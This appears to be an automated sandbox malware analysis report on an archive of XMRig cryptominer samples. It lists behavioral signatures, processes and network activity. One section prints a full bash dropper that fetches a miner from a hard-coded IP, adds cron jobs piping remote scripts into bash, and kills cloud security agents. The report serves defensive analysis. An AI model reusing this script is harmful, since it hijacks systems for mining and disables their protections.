Malware Analysis Report

2025-01-02 07:09

Sample ID 241202-dcyx7s1lfk
Target hoze样本.zip
SHA256 747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7
Tags
defense_evasion discovery xmrig_linux miner antivm xmrig credential_access execution persistence privilege_escalatio privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK: Enterprise Matrix V15

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral27, behavioral19, behavioral13, behavioral14, behavioral22, behavioral30, behavioral10, behavioral32, behavioral3, behavioral16, behavioral18, behavioral20, behavioral21, behavioral26, behavioral29, behavioral1, behavioral7, behavioral15, behavioral24, behavioral25, behavioral4, behavioral8, behavioral11, behavioral17, behavioral23, behavioral2, behavioral31, behavioral28, behavioral6, behavioral9, behavioral12, behavioral5 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Threat Level: Known bad

The file hoze样本.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery xmrig_linux miner antivm xmrig credential_access execution persistence privilege_escalatio privilege_escalation

Xmrig family

xmrig

Xmrig_linux family

XMRig Miner payload

Modifies password files for system users/ groups

Adds new SSH keys

OS Credential Dumping

File and Directory Permissions Modification

Write file to user bin folder

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Creates/modifies Cron job

Checks mountinfo of local process

Deletes log files

Attempts to change immutable files

Reads hardware information

Checks hardware identifiers (DMI)

Enumerates running processes

Reads process memory

Changes its process name

Checks CPU configuration

Reads CPU attributes

Enumerates physical storage devices

Reads runtime system information

System Location Discovery: System Language Discovery

Enumerates kernel/hardware configuration

System Network Configuration Discovery

Software Deployment Tools

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-02 02:52

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral27

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

133s

Max time network

145s

Command Line

[/tmp/xrx/secure]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/2290/ctty /usr/bin/pgrep N/A
File opened for reading /proc/17/stat /usr/bin/pgrep N/A
File opened for reading /proc/32/stat /usr/bin/pgrep N/A
File opened for reading /proc/1930/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/18/ctty /usr/bin/pgrep N/A
File opened for reading /proc/190/stat /usr/bin/pgrep N/A
File opened for reading /proc/2/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/8/ctty /usr/bin/pgrep N/A
File opened for reading /proc/9/status /usr/bin/pgrep N/A
File opened for reading /proc/1959/status /usr/bin/pgrep N/A
File opened for reading /proc/2010/ctty /usr/bin/pgrep N/A
File opened for reading /proc/49/status /usr/bin/pgrep N/A
File opened for reading /proc/1823/stat /usr/bin/pgrep N/A
File opened for reading /proc/1930/ctty /usr/bin/pgrep N/A
File opened for reading /proc/38/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1883/status /usr/bin/pgrep N/A
File opened for reading /proc/2271/status /usr/bin/pgrep N/A
File opened for reading /proc/2520/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2/ctty /usr/bin/pgrep N/A
File opened for reading /proc/24/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/29/status /usr/bin/pgrep N/A
File opened for reading /proc/2216/ctty /usr/bin/pgrep N/A
File opened for reading /proc/386/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/821/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2216/status /usr/bin/pgrep N/A
File opened for reading /proc/124/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/136/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1731/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2002/stat /usr/bin/pgrep N/A
File opened for reading /proc/2319/stat /usr/bin/pgrep N/A
File opened for reading /proc/41/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/386/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1942/stat /usr/bin/pgrep N/A
File opened for reading /proc/1988/stat /usr/bin/pgrep N/A
File opened for reading /proc/2256/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2241/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2319/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/17/status /usr/bin/pgrep N/A
File opened for reading /proc/29/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/584/status /usr/bin/pgrep N/A
File opened for reading /proc/2150/stat /usr/bin/pgrep N/A
File opened for reading /proc/5/stat /usr/bin/pgrep N/A
File opened for reading /proc/56/stat /usr/bin/pgrep N/A
File opened for reading /proc/1985/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/42/stat /usr/bin/pgrep N/A
File opened for reading /proc/44/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/46/stat /usr/bin/pgrep N/A
File opened for reading /proc/2250/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2301/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1063/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2002/status /usr/bin/pgrep N/A
File opened for reading /proc/2165/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/56/ctty /usr/bin/pgrep N/A
File opened for reading /proc/511/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1985/stat /usr/bin/pgrep N/A
File opened for reading /proc/12/ctty /usr/bin/pgrep N/A
File opened for reading /proc/18/status /usr/bin/pgrep N/A
File opened for reading /proc/817/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/190/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1122/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1711/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/3/ctty /usr/bin/pgrep N/A
File opened for reading /proc/30/ctty /usr/bin/pgrep N/A
File opened for reading /proc/35/cgroup /usr/bin/pgrep N/A

Processes

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c exec '/tmp/xrx/secure' "$@" /tmp/xrx/secure]

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c
#!/bin/bash
ifrunning=$(pgrep xrx)
########################
########################
downloadminer(){
  link1="http://185.252.178.82:6972/xrx/xrx"
  link2="http://185.252.178.82:6972/configs/config-xrx.json"
  mkdir /var/tmp/.xrx
  cd /var/tmp/.xrx/
  chattr -ia /var/tmp/.xrx/xrx
  chattr -ia /var/tmp/.xrx/config.json
  rm -rf /var/tmp/.xrx/xrx
  rm -rf /var/tmp/.xrx/config.json
  curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate
  curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate
  mv config-xrx.json config.json
  chmod +x /var/tmp/.xrx/xrx
}
########################
########################
crontablegend(){
  if (( $EUID != 0 )); then
    if ! crontab -l | grep -q 'secure'; then
      cd /dev/shm
      rm -rf /dev/shm/.spark
      echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark
      sleep 1
      echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark
      sleep 1
      echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark
      sleep 1
      echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark
      sleep 1
      echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark
      sleep 1
      crontab .spark
      sleep 2
      rm -rf /dev/shm/.spark
    fi
  fi
  if (( $EUID == 0 )); then
    if ! cat /etc/crontab | grep -q 'secure'; then
      echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab
      echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab
      echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab
      echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab
      echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab
    fi
  fi
}
########################
########################
gettingmineru(){
  fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'`
  if [ -f /var/tmp/.xrx/xrx ]; then
    echo "miner intact"
  else
    echo "miner not found,downloading..."
    downloadminer
  fi
  if [[ "$fsiz" -gt 0 ]]; then
    echo "miner size intact"
  else
    echo "filesize 0,downloading..."
    downloadminer
  fi
}
########################
########################
gettingmineru
crontablegend
if test -z "$ifrunning" ; then
  echo "xrx not running,starting..."
  /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1
  sleep 1
  echo -e "pid:"
  pgrep xrx
fi
/tmp/xrx/secure]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/xrx/init.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1166/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1187/stat /usr/bin/pidof N/A
File opened for reading /proc/74/cmdline /usr/bin/pidof N/A
File opened for reading /proc/110/cmdline /usr/bin/pidof N/A
File opened for reading /proc/843/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1042/stat /usr/bin/pidof N/A
File opened for reading /proc/1090/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1092/stat /usr/bin/pidof N/A
File opened for reading /proc/1494/stat /usr/bin/pidof N/A
File opened for reading /proc/1583/stat /usr/bin/pidof N/A
File opened for reading /proc/415/stat /usr/bin/pidof N/A
File opened for reading /proc/510/stat /usr/bin/pidof N/A
File opened for reading /proc/1078/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1442/stat /usr/bin/pidof N/A
File opened for reading /proc/427/stat /usr/bin/pidof N/A
File opened for reading /proc/1455/stat /usr/bin/pidof N/A
File opened for reading /proc/1494/cmdline /usr/bin/pidof N/A
File opened for reading /proc/4/stat /usr/bin/pidof N/A
File opened for reading /proc/119/stat /usr/bin/pidof N/A
File opened for reading /proc/197/cmdline /usr/bin/pidof N/A
File opened for reading /proc/198/stat /usr/bin/pidof N/A
File opened for reading /proc/783/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1392/stat /usr/bin/pidof N/A
File opened for reading /proc/1319/stat /usr/bin/pidof N/A
File opened for reading /proc/1347/stat /usr/bin/pidof N/A
File opened for reading /proc/27/cmdline /usr/bin/pidof N/A
File opened for reading /proc/83/stat /usr/bin/pidof N/A
File opened for reading /proc/212/stat /usr/bin/pidof N/A
File opened for reading /proc/412/stat /usr/bin/pidof N/A
File opened for reading /proc/776/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1088/stat /usr/bin/pidof N/A
File opened for reading /proc/92/cmdline /usr/bin/pidof N/A
File opened for reading /proc/197/stat /usr/bin/pidof N/A
File opened for reading /proc/1160/stat /usr/bin/pidof N/A
File opened for reading /proc/1165/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1363/stat /usr/bin/pidof N/A
File opened for reading /proc/1135/cmdline /usr/bin/pidof N/A
File opened for reading /proc/4/cmdline /usr/bin/pidof N/A
File opened for reading /proc/90/cmdline /usr/bin/pidof N/A
File opened for reading /proc/95/stat /usr/bin/pidof N/A
File opened for reading /proc/586/stat /usr/bin/pidof N/A
File opened for reading /proc/594/stat /usr/bin/pidof N/A
File opened for reading /proc/676/cmdline /usr/bin/pidof N/A
File opened for reading /proc/634/stat /usr/bin/pidof N/A
File opened for reading /proc/635/stat /usr/bin/pidof N/A
File opened for reading /proc/23/stat /usr/bin/pidof N/A
File opened for reading /proc/78/cmdline /usr/bin/pidof N/A
File opened for reading /proc/91/cmdline /usr/bin/pidof N/A
File opened for reading /proc/96/cmdline /usr/bin/pidof N/A
File opened for reading /proc/102/stat /usr/bin/pidof N/A
File opened for reading /proc/206/cmdline /usr/bin/pidof N/A
File opened for reading /proc/676/stat /usr/bin/pidof N/A
File opened for reading /proc/963/stat /usr/bin/pidof N/A
File opened for reading /proc/1183/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1244/cmdline /usr/bin/pidof N/A
File opened for reading /proc/11/cmdline /usr/bin/pidof N/A
File opened for reading /proc/314/stat /usr/bin/pidof N/A
File opened for reading /proc/415/cmdline /usr/bin/pidof N/A
File opened for reading /proc/637/stat /usr/bin/pidof N/A
File opened for reading /proc/1322/cmdline /usr/bin/pidof N/A
File opened for reading /proc/79/cmdline /usr/bin/pidof N/A
File opened for reading /proc/195/stat /usr/bin/pidof N/A
File opened for reading /proc/1101/stat /usr/bin/pidof N/A
File opened for reading /proc/1162/cmdline /usr/bin/pidof N/A

Processes

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c exec '/tmp/xrx/init.sh' "$@" /tmp/xrx/init.sh]

/tmp/xrx/init.sh

[/tmp/xrx/init.sh]

/bin/bash

[/tmp/xrx/init.sh -c
#!/bin/bash
if [[ $(cat config.json | grep xxcountxx) ]]; then
  echo "configuring miner"
  sed -i "s/xxcountxx/$(nproc)/g" config.json
else
  echo "using preconfigured miner"
fi
PID=$(pidof xrx)
if [ $# -eq 0 ]; then ##if no arguments
  if [ -z "${PID}" ]; then
    ./xrx </dev/null &>/dev/null & disown -h %1
    echo "miner online"
  else
    echo "miner already online"
  fi
fi
/tmp/xrx/init.sh]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/cat

[cat config.json]

/usr/bin/pidof

[pidof xrx]

/tmp/xrx/xrx

[./xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Signatures

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

Processes

/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5

[/tmp/样本/Linux/挖矿程序/9D099882A24757AC5033B0C675FECBE5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win7-20241023-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

148s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsbe-20240611-en

Max time kernel

2s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/736/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/388/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/244/stat /usr/bin/killall N/A
File opened for reading /proc/714/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/714/cmdline /usr/bin/killall N/A
File opened for reading /proc/678/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/391/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/708/stat /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/684/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/69/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/695/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/695/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/685/stat /usr/bin/killall N/A
File opened for reading /proc/695/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/121/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/316/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/598/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/653/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/314/stat /usr/bin/killall N/A
File opened for reading /proc/229/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/112/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/143/cmdline /usr/bin/killall N/A
File opened for reading /proc/653/stat /usr/bin/killall N/A
File opened for reading /proc/143/stat /usr/bin/killall N/A
File opened for reading /proc/659/stat /usr/bin/killall N/A
File opened for reading /proc/279/stat /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/659/cmdline /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/598/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/601/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/155/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/654/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/113/stat /usr/bin/killall N/A
File opened for reading /proc/643/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/279/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/328/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/143/stat /usr/bin/killall N/A
File opened for reading /proc/603/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

140s

Command Line

[/tmp/xrx/xrx]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xrx/xrx N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xrx/xrx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xrx/xrx N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/types /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xrx/xrx N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/xrx/xrx N/A
